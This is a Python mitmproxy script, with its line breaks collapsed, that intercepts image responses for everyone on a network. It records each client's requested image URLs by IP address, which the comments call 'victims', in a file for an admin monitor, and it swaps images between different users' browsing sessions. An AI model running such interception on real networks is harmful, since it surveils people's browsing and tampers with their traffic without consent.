def response(context, flow): # finding the image requests and making sure the follwoing script is not running for the admin computer, which present the admin monitor if flow.response.headers.get_first( "content-type", "").startswith("image") and str( flow.client_conn.address.host) != admin_ip: #variable to store the client's ip address throughout the script victim_host = str(flow.client_conn.address.host) #now the actual script begins: with decoded(flow.response): # automatically decode gzipped responses. #try/except to prevent from errors try: #retrieving the image request s = cStringIO.StringIO(flow.response.content) #storing the size of the image that has been requested in a variable img_size = Image.open(s).size #only running the rest of the script if the image is of a minimum targeted resolution if (int(img_size[0]) > min_img_width or int(img_size[1]) > min_img_height): #if the client's ip address is not yet in the dicionairy, an entry has to be added if flow.client_conn.address.host not in victims: #add the entry victims[victim_host] = [] #after adding the entry or, if it already exist do the follwing: #the image url has three components, 'http://' at the start, followed by the host name and the path #these components are retrieved here: url_host = flow.request.headers.get_first("host") url_path = flow.request.path #and combined here to form the full url of the requested image. #while combining, the url is put into the value array of the corresponding client-ip-address #in the dicionairy victims[victim_host].append("http://" + url_host + url_path) #now we upadte the data.txt file which defines the images that appear on the admin screen #opening appender in 'a' mode let's us append to the file appender = open('data.txt', 'a') appender.write("http://" + url_host + url_path + " ") appender.close() #next we make sure that there are not more images in the dicitonairy and data file #than we intent to (this is needed to prevent from data overloads) #we also make sure that, if images have to be deleted, they are taken from the client's #dictionairy entry that currently has the most image urls/image requests in the pool #temporary variable to count the overall images in the pool: number_imgs = 0 #for every value (which is itself an array) in the dictionairy... for sites in victims.values(): #...we go through every url/element in the array... for site in sites: #...and count the images number_imgs = number_imgs + 1 #we then take the final number to check if there are more than we wanted. #that is defined at the beginning of the this script if number_imgs > max_number_imgs: #if there are too many images, #we want to find out which client #currently supplies the most #requests to the image pool #temporary variables to store name #and number of sites of the 'record holding' client record_holder = "" record = 0 #looping through every client in the dictionairy... for key in victims: #temp variable to store the number of each client's #img requests count = 0 #...looping through each image url in the value array of the client for sites in victims.get(key): #counting the urls count = count + 1 #testing who has the most urls in they value array if int(count) > int(record): #and assign the name of record holder to the variable record_holder = str(key) #and update the record for further loops record = int(count) #when we found the 'record holder' we define his ip adress #as the one out of whiches key value array we delete a random url to_delete_from = record_holder #shuffle the key value array: random.shuffle(victims.get(to_delete_from)) #and take out a value using pop() victims.get(to_delete_from).pop() #lastly we update the data.txt also so the changes we made #are visible on the admin monitor #opening writer in 'w' mode will delete all content and first... writer = open('data.txt', 'w') #..and then we iterate through all values for every client #in the dictionairy to write them to the file for sites in victims.values(): for site in sites: writer.write(site + " ") #finally we close the writer writer.close() #the following part of the script is executed #once there is more than one person coinnected #to the network/sending image requests if len(victims) > 1: #to find a client's ip adress in the dictionairy, #that is different to the client who is currently #requesting an image, we first assign the #requesting client to a temporary variable 'random_pick'... random_pick = victim_host #...and then run a while loop, picking random keys from #the dictionair until we found a exchange partner while str(random_pick) == str(victim_host): random_pick = random.choice(victims.keys()) #we make sure the exchange partner has url in this value array in the dicitonairy #we could improve that part of the script to make sure keys with empty values #get deleted if len(victims.get(random_pick)) > 0: #and if he does, we shuffle the urls... random.shuffle(victims.get(random_pick)) #...in order to pick a random one to return to the requesting client #and take it out of the array value afterwards using pop() replace_img = victims.get(random_pick).pop() #number_imgs = 0 #TBC not needed #next we update the data.txt file to represent #the changes on the admin monitor writer = open('data.txt', 'w') for sites in victims.values(): for site in sites: writer.write(site + " ") #number_imgs = number_imgs + 1 #TBC not needed writer.close() #and finally we return the replaced image to the requesting client #like this: img_temp = cStringIO.StringIO( urllib.urlopen(str(replace_img)).read()) img = Image.open(img_temp) img_return = cStringIO.StringIO() img.save(img_return, "jpeg") flow.response.content = img_return.getvalue() flow.response.headers["content-type"] = [ "image/jpeg" ] except: # Unknown image types etc. pass